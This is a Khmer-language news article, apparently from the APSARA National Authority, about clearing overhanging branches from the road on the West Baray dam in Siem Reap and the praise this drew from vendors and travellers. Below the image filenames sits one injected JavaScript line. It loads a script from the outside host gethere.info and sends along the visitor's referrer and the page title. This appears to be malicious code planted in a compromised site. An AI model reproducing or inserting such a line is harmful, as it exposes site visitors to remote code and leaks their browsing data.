ប្រជាពលរដ្ឋអ្នកធ្វើដំណើរនិងភ្ញៀវទេសចរសម្តែងការសប្បាយរីករាយ បន្ទាប់ពីផ្លូវតាមខ្នងទំនប់បារាយណ៍ទឹកថ្លាស្រឡះល្អស្រួលធ្វើដំណើរ

ខេត្តសៀមរាប៖ ក្រោយពីនាយកដ្ឋានគ្រប់គ្រងព្រៃឈើ ទេសភាពវប្បធម៌ និងបរិស្ថាននៃអាជ្ញាធរជាតិអប្សរាបានកាត់ក្រី ត្រួសត្រាយមែកឈើដុះលយចេញមកគ្របដងផ្លូវបណ្តាលឲ្យផ្លូវតូចចង្អៀតពិបាកក្នុងការធ្វើដំណើរ នាពេល ភ្ជុំបិណ្ឌកន្លងមក ប្រជាពលរដ្ឋ និងភ្ញៀវទេសចរដែលបានឆ្លងកាត់ខ្នងទំនប់បារាយណ៍ទឹកថ្លា បានសម្តែងការត្រេកអរ និងអបអរសាទរគាំទ្រចំពោះសកម្មភាពរបស់អាជ្ញាធរជាតិអប្សរា។

លោក យិន សូវ៉ាត អនុប្រធាននាយកដ្ឋានគ្រប់គ្រងព្រៃឈើ ទេសភាពវប្បធម៌ និងបរិស្ថាន នៃអាជ្ញាធរជាតិអប្សរាបានលើកឡើងថា ប្រជាពលរដ្ឋ អ្នកធ្វើដំណើរ និងភ្ញៀវទេសចរ ដែលបានមកលេងបារាយណ៍ទឹកថ្លាក្នុងឱកាសបុណ្យភ្ជុំបិណ្ឌ និងក្រោយបុណ្យភ្ជុំបិណ្ឌកន្លងទៅថ្មីៗនេះ បានសម្តែងការស្វាគមន៍អបអរសាទរ និងត្រេកអរសប្បាយរីករាយ នៅពេលពួកគាត់ឃើញតាមដងផ្លូវលើខ្នងទំនប់បារាយណ៍ទឹកថ្លានេះ ស្រឡះស្អាត ធំទូលាយ និងងាយស្រួលក្នុងការធ្វើដំណើរ។

អ៊ុំុំស្រី កុក យិប ជាអ្នកលក់ដូរនៅលើខ្នងទំនប់បារាយណ៍បាននិយាយថាអ៊ុំុំស្រីពិតជាសប្បាយចិត្តខ្លាំងណាស់ នៅពេលឃើញតាមដងផ្លូវលើខ្នងទំនប់បារាយណ៍នេះ ធំទូលាយ ស្រឡះស្អាត ងាយស្រួលធ្វើដំណើរទាំងថ្ងៃទាំងយប់មិនពិបាកដូចមុនទៀតទេ។ អ៊ុំុំស្រីបញ្ជាក់ថា រយៈកាលកន្លងមក មានការត្អូញតែ្អរពីប្រជាពលរដ្ឋ អ្នកធ្វើដំណើរ និងភ្ញៀវទេសចរ។ ពួកគាត់ពិបាកធ្វើដំណើរដោយសារមានមែកឈើដុះលយចេញមកគ្របបាំងលើដងផ្លូវ ធ្វើឲ្យផ្លូវតូចចង្អៀតលំបាកជៀសគ្នា និងបាំងមើលគ្នាមិនឃើញ ដែលអាចនឹងបង្កឲ្យមានគ្រោះថ្នាក់ចរាចរណ៍កើតឡើងបាន។

លោក ខេត្ត ជាអ្នកធ្វើដំណើរបានសម្តែងការសប្បាយរីករាយផងដែរ នៅពេលឃើញផ្លូវលើខ្នងបារាយណ៍ ធំទូលាយ ស្រឡះស្អាត ស្រួលធ្វើដំណើរ។ ទន្ទឹមគ្នានេះដែរ លោកក៏បានអរគុណចំពោះអាជ្ញាធរជាតិអប្សរាដែលបានគិតគូរនិងយកចិត្តទុកដាក់ចំពោះសុខទុក្ខរបស់ប្រជាពលរដ្ឋ អ្នកធ្វើដំណើរ និងភ្ញៀវទេសចរដែលធ្វើដំណើរតាមដងផ្លូវទំនប់បារាយណ៍ទឹកថ្លានេះ និងសូមជូនពរឲ្យថ្នាក់ដឹកនាំ មន្រី្តបុគ្គលិកអាជ្ញាធរជាតិអប្សរាទាំងអស់ជួបប្រទះតែសេចក្តីសុខចម្រើន និងសម្រេចជោគជ័យគ្រប់ភារកិច្ច។

គួររំឭកផងដែរថាអាជ្ញាធរជាតិអប្សរាបានកាត់ក្រី និងត្រួសត្រាយមែកឈើដែលដុះលយចេញមកគ្របបាំងលើដងផ្លូវតាមខ្នងទំនប់បារាយណ៍ទឹកថ្លាកាលពីថ្ងៃទី២៧ ខែកញ្ញា ឆ្នាំ២០១៦ដើម្បីលើកកម្ពស់សោភ័ណភាពនិងបញ្ជៀសគ្រោះថ្នាក់ផ្សេងៗដែលអាចនឹងកើតមានឡើងនៅពេលប្រជាពលរដ្ឋ អ្នកធ្វើដំណើរ និងភ្ញៀវទេសចរធ្វើដំណើរទៅវិញទៅមកលើខ្នងទំនប់បារាយណ៍ទឹកថ្លានេះ ៕

14485075_621649294708669_4810115906735992343_n 14494608_621649184708680_3055136842185100214_n 14520517_621649178042014_3559149137490954196_n 14563418_621649241375341_5717603161230322586_n 14601091_621649181375347_690443163029858514_n

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More